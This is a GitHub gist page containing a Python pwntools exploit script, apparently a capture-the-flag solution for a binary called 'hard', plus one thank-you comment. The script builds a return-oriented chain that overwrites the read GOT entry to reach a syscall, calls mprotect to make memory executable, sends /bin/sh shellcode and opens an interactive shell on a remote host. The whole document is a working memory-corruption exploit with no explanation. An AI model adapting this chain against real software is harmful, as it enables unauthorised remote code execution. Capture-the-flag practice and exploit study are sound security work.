Skip to content

Instantly share code, notes, and snippets.

@PaulCher
Created April 9, 2017 19:53
Show Gist options
  • Save PaulCher/5e3f48f79b412c695f8c23bf4b48b60b to your computer and use it in GitHub Desktop.
Save PaulCher/5e3f48f79b412c695f8c23bf4b48b60b to your computer and use it in GitHub Desktop.
#!/usr/bin/env python
from pwn import *
context(os='linux', arch='amd64')
BINARY = './hard'
def call_func(func, rdi=0, rsi=0, rdx=0):
ucall = 0x04005A0
upop = 0x004005BA
p = ''
p += p64(upop)
p += p64(0)
p += p64(1)
p += p64(func)
p += p64(rdx)
p += p64(rsi)
p += p64(rdi)
p += p64(ucall)
p += 'A' * 56
return p
def exploit():
REMOTE = 1
if REMOTE:
r = remote('128.199.152.175', 10001)
else:
r = process(BINARY)
elf = ELF(BINARY)
shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
read = 0x400400
bin_sh = 0x601700
overwrite_read = 0x60100f
address_of_page = 0x601000
page_size = 0x1000
rwx = 7
read_ow = ''
read_ow += '\0' * 9 # padding
read_ow += '\x7e' # syscall lsb
shellcode = asm(shellcraft.amd64.sh())
p = ''
p += 'A' * 16 # padding
p += 'B' * 8 # rbp
p += call_func(elf.got['read'], 0, bin_sh, 0x40) # read(0, 0x601700, 0x20)
p += call_func(elf.got['read'], 0, overwrite_read, 0xa) # read(0, 0x601018, 0xa) # returns 0xa at $rax
p += call_func(elf.got['read'], address_of_page, page_size, rwx) # return to syscall with $rax = 0xa, which means mprotect(0x601000, 0x1000, 0x7);
p += p64(bin_sh)
r.send(p)
sleep(1)
r.send(shellcode)
sleep(1)
r.sendline(read_ow)
r.interactive()
if __name__ == '__main__':
exploit()
Copy link

ghost commented Apr 14, 2017

thank you very much. :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment